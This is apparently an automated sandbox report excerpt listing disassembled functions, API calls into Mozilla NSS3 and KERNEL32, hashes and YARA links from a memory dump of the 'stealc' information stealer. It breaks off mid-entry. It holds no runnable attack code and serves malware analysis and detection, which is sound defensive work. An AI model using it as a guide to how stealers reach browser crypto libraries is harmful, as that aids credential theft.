Instruction Fuzzy Hash: DA31EBB29001147BDB20AE68AE41BBB76B8DF55608F050976FC09B7715F731D914C6E2

Function 6C897E30 Relevance: 10.6, APIs: 7, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C897E48

Part of subcall function 6C8F0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C8987ED,00000800,6C88EF74,00000000), ref: 6C8F1000
Part of subcall function 6C8F0FF0: PR_NewLock.NSS3(?,00000800,6C88EF74,00000000), ref: 6C8F1016
Part of subcall function 6C8F0FF0: PL_InitArenaPool.NSS3(00000000,security,6C8987ED,00000008,?,00000800,6C88EF74,00000000), ref: 6C8F102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C897E5B

Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C897E7B

Part of subcall function 6C8EFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C8E8D2D,?,00000000,?), ref: 6C8EFB85
Part of subcall function 6C8EFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C8EFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C9B925C,?), ref: 6C897E92

Part of subcall function 6C8EB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9C18D0,?), ref: 6C8EB095

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C897EA1
SECOID_FindOID_Util.NSS3(00000004), ref: 6C897ED1
SECOID_FindOID_Util.NSS3(00000004), ref: 6C897EFA

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_FindItem_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpy
String ID:
API String ID: 3989529743-0
Opcode ID: dfc21fcf19dd4e76bec3f8be8f90416834501b1b7f139908de91713fc3e5fb32
Instruction ID: 8091716c9a4e936184c38ff15bb7d7ac6c390737acaf533ee8b384f58f088f33
Opcode Fuzzy Hash: dfc21fcf19dd4e76bec3f8be8f90416834501b1b7f139908de91713fc3e5fb32
Instruction Fuzzy Hash: 523184B2E012159BEB208B6D9E40B6B73A8AF45A58F154D34DD16EBB41F731EC04C7A0

Function 6C8EDC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6C8ED9E4,00000000), ref: 6C8EDC30
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6C8ED9E4,00000000), ref: 6C8EDC4E
PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6C8ED9E4,00000000), ref: 6C8EDC5A
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C8EDC7E
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C8EDCAD

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Alloc_Util$Arenamemcpy
String ID:
API String ID: 2632744278-0
Opcode ID: eae29d3f1cea015e78f0388f51a6b3e166c8077847c96676db5faa4040e97418
Instruction ID: b202827332cd25cf5d7907c6fa830f7ea3bdd5f45a22d4cbcbcb423aab0b80f4
Opcode Fuzzy Hash: eae29d3f1cea015e78f0388f51a6b3e166c8077847c96676db5faa4040e97418
Instruction Fuzzy Hash: 6931A4B5504204DFD720CF1DD980B56B7F8AF9A398F15882AE95CCBB01D771E948CBA1

Function 6C8B2E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C8AE728,?,00000038,?,?,00000000), ref: 6C8B2E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8B2E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8B2E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6C8B2E8F
PL_HashTableLookup.NSS3(?,?), ref: 6C8B2E9E
PR_Unlock.NSS3(?), ref: 6C8B2EAB
PR_Unlock.NSS3(?), ref: 6C8B2F0D

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 4b828f72a3853ad7aba81d722fb3e3556958178ab277357eca474aae7aba8b32
Instruction ID: 5c9d0782d889f5b67a385e29ac9b18361505fc7cccf0007f72a44725711064c5
Opcode Fuzzy Hash: 4b828f72a3853ad7aba81d722fb3e3556958178ab277357eca474aae7aba8b32
Instruction Fuzzy Hash: AB313A75A00105ABEF106F68ED4487ABB74FF15258B148974EC1897B11E731EC64C7E0

Function 6C8FCEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C8FCD93,?), ref: 6C8FCEEE

Part of subcall function 6C8F14C0: TlsGetValue.KERNEL32 ref: 6C8F14E0
Part of subcall function 6C8F14C0: EnterCriticalSection.KERNEL32 ref: 6C8F14F5
Part of subcall function 6C8F14C0: PR_Unlock.NSS3 ref: 6C8F150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C8FCD93,?), ref: 6C8FCEFC

Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C8FCD93,?), ref: 6C8FCF0B

Part of subcall function 6C8F0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C8F08B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C8FCD93,?), ref: 6C8FCF1D

Part of subcall function 6C8EFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C8E8D2D,?,00000000,?), ref: 6C8EFB85
Part of subcall function 6C8EFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C8EFBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C8FCD93,?), ref: 6C8FCF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C8FCD93,?), ref: 6C8FCF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6C8FCD93,?,?,?,?,?,?,?,?,?,?,?,6C8FCD93,?), ref: 6C8FCF78

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 7153dce3d1beccb6578c1bd7573e96b0b05e89db80c6f8939bb3e03e5538e04b
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: E811DBB5E0020457F7306A6A7E41BA7B5DCDF9418DF004839EC29D7742FB61DA0986B1

Function 6C8A8C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C8A8C1B
EnterCriticalSection.KERNEL32 ref: 6C8A8C34
PL_ArenaAllocate.NSS3 ref: 6C8A8C65
PR_Unlock.NSS3 ref: 6C8A8C9C
PR_Unlock.NSS3 ref: 6C8A8CB6

Part of subcall function 6C93DD70: TlsGetValue.KERNEL32 ref: 6C93DD8C
Part of subcall function 6C93DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C93DDB4

Strings

KRAM, xrefs: 6C8A8C8F

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: 92e58d3b44400ace60628841785edbdf5858a9f8a2f77af6166ca153b1d74744
Instruction ID: 05709475174f7ee08af7b52cb0288cc021f3f7c17a93018b959b5915a3b7be40
Opcode Fuzzy Hash: 92e58d3b44400ace60628841785edbdf5858a9f8a2f77af6166ca153b1d74744
Instruction Fuzzy Hash: 492180B16056019FD750AFB8C584569BBF4FF05304F168D6AD8888B701EB31D886CF91

Function 6C923E20 Relevance: 10.6, APIs: 7, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 6C925B40: PR_GetIdentitiesLayer.NSS3 ref: 6C925B56

PR_EnterMonitor.NSS3(?), ref: 6C923E45

Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C9590AB
Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C9590C9
Part of subcall function 6C959090: EnterCriticalSection.KERNEL32 ref: 6C9590E5
Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C959116
Part of subcall function 6C959090: LeaveCriticalSection.KERNEL32 ref: 6C95913F

PR_EnterMonitor.NSS3(?), ref: 6C923E5C
PR_EnterMonitor.NSS3(?), ref: 6C923E73
PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C923EA6

Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF

PR_ExitMonitor.NSS3(?), ref: 6C923EC0
PR_ExitMonitor.NSS3(?), ref: 6C923ED7
PR_ExitMonitor.NSS3(?), ref: 6C923EEE

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Monitor$EnterValue$Exit$CriticalSection$ErrorIdentitiesLayerLeave
String ID:
API String ID: 2517541793-0
Opcode ID: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction ID: 66c4f4481e6430b72dcf3c4d5104f20a38e0cbdb5f3425e2357db0d21579fd51
Opcode Fuzzy Hash: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction Fuzzy Hash: F4118BB1520611ABE7319E39FC02BE777A5EB61318F404834E59987A24E73AE92DC742

Function 6C9A2C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C9A2CA0
PR_ExitMonitor.NSS3 ref: 6C9A2CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C9A2CD1
strdup.MOZGLUE(?), ref: 6C9A2CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C9A2D27

Strings

Loaded library %s (static lib), xrefs: 6C9A2D22

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 91e3ec908d3a2df4c61cda4e3a9d3b3e7be5531c5a2c165f9ec6fcc6bad544c0
Instruction ID: 5a4778ee69390647c78e5b859d207234174638af011b8b39aa4819d1448670e9
Opcode Fuzzy Hash: 91e3ec908d3a2df4c61cda4e3a9d3b3e7be5531c5a2c165f9ec6fcc6bad544c0
Instruction Fuzzy Hash: 761138B1605650AFEB008F5AE808A6A77B8EB5630DF24843DD81DC7B41D731D809CBA1

Function 6C89BDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C89BDCA

Part of subcall function 6C8F0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C8987ED,00000800,6C88EF74,00000000), ref: 6C8F1000
Part of subcall function 6C8F0FF0: PR_NewLock.NSS3(?,00000800,6C88EF74,00000000), ref: 6C8F1016
Part of subcall function 6C8F0FF0: PL_InitArenaPool.NSS3(00000000,security,6C8987ED,00000008,?,00000800,6C88EF74,00000000), ref: 6C8F102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C89BDDB

Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C89BDEC

Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F116E

SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6C89BE03

Part of subcall function 6C8EFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C8E8D2D,?,00000000,?), ref: 6C8EFB85
Part of subcall function 6C8EFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C8EFBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C89BE22
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C89BE30
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C89BE3B

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1821307800-0
Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction ID: 9edad98bc6b2169b04a4ec749ea6054a6805dee8d8ac59c77da9c8c6682512c0
Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction Fuzzy Hash: EC012BA9A4021176F630226E7E01F7F364C4FA168DF140530EE18D6BC2FB51D51982B6

Function 6C921C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C921C74

Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF

DeleteCriticalSection.KERNEL32(?), ref: 6C921C92
free.MOZGLUE(?), ref: 6C921C99
DeleteCriticalSection.KERNEL32(?), ref: 6C921CCB
free.MOZGLUE(?), ref: 6C921CD2

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CriticalDeleteSectionfree$ErrorValue
String ID:
API String ID: 3805613680-0
Opcode ID: f47516f9e5c43bf0f39644f2b11a2c7b35770cba237cc76e67966a608fda4a79
Instruction ID: 33dcf1546fcc790c30b6e17948312d253a619eb47384c9a0175450a7aefa0505
Opcode Fuzzy Hash: f47516f9e5c43bf0f39644f2b11a2c7b35770cba237cc76e67966a608fda4a79
Instruction Fuzzy Hash: 9F01D6B5F2DAB05FEF10EFA4AD0D7453B786B1B308F200125E559A2A40D736D5248796

Function 6C981C40 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,6C883D77,?,?,6C884E1D), ref: 6C981C8A
sqlite3_free.NSS3(00000000), ref: 6C981CB6

Strings

non-deterministic use of %s() in %s, xrefs: 6C981C85
a CHECK constraint, xrefs: 6C981C76, 6C981C81
an index, xrefs: 6C981C67
a generated column, xrefs: 6C981C6C

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintf
String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
API String ID: 1840970956-3705377941
Opcode ID: a96e0cd150ff491341e904989710517e25495ce4707eb256c45fc4c1e3b50bd3
Instruction ID: 161cddff0256acebee32a55e42029731c73e675f6a70764f3fc9ad3fc7c58b79
Opcode Fuzzy Hash: a96e0cd150ff491341e904989710517e25495ce4707eb256c45fc4c1e3b50bd3
Instruction Fuzzy Hash: 9B0124B1B002404BD710AB2CD8029B277E5EF8234CB14487DE8488BB02EB22E866C752

Function 6C932E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6C933046

Part of subcall function 6C91EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C91EE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C907FFB), ref: 6C93312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C933154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C932E8B

Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF

Part of subcall function 6C91F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C909BFF,?,00000000,00000000), ref: 6C91F134

memcpy.VCRUNTIME140(8B3C75C0,?,6C907FFA), ref: 6C932EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C93317B

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: f0862282aea2f5f16bab4164cde58b578e1c1bc46664999c3d6bde1125009872
Instruction ID: 447c57823ccea5d49ab98e54ccb14cd5778cfb5780b7d61364706ec00e56459b
Opcode Fuzzy Hash: f0862282aea2f5f16bab4164cde58b578e1c1bc46664999c3d6bde1125009872
Instruction Fuzzy Hash: D0A1CD75A002289FDB24CF54CC80BAAB7B5EF49308F048199E94D6B741E731EE95CF91

Function 6C8FED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C8FED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C8FEDCE

Part of subcall function 6C8F0BE0: malloc.MOZGLUE(6C8E8D2D,?,00000000,?), ref: 6C8F0BF8
Part of subcall function 6C8F0BE0: TlsGetValue.KERNEL32(6C8E8D2D,?,00000000,?), ref: 6C8F0C15

free.MOZGLUE(00000000,?,?,?,?,6C8FB04F), ref: 6C8FEE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C8FEECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C8FEEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C8FEEFB

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
